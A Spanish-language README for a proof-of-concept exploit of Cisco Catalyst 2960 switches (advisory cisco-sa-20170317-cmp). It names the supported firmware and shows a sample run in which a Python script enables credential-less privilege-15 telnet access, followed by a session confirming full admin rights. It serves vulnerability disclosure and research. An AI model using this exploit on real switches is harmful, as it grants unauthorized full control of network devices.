
crédito a artkond
Este repositorio contiene código de Prueba de Concepto para explotar la vulnerabilidad de ejecución remota de código divulgada por Cisco Systems el 17 de marzo de 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
El artículo sobre el exploit está disponible aquí - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
El código del exploit RCE está disponible para el modelo de switch Cisco Catalyst 2960. Este exploit depende del firmware. Se admiten dos versiones de firmware:
12.2(55)SE1 C2960-LANBASEK9-M
12.2(55)SE11 C2960-LANBASEK9-M
El código de denegación de servicio está disponible como un módulo de Ruby de Metasploit. Esto debería funcionar para la mayoría de los switches mencionados en el aviso de Cisco (se necesita confirmación).
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.
catalyst1#show priv
Current privilege level is 15
Artem Kondratenko https://twitter.com/artkond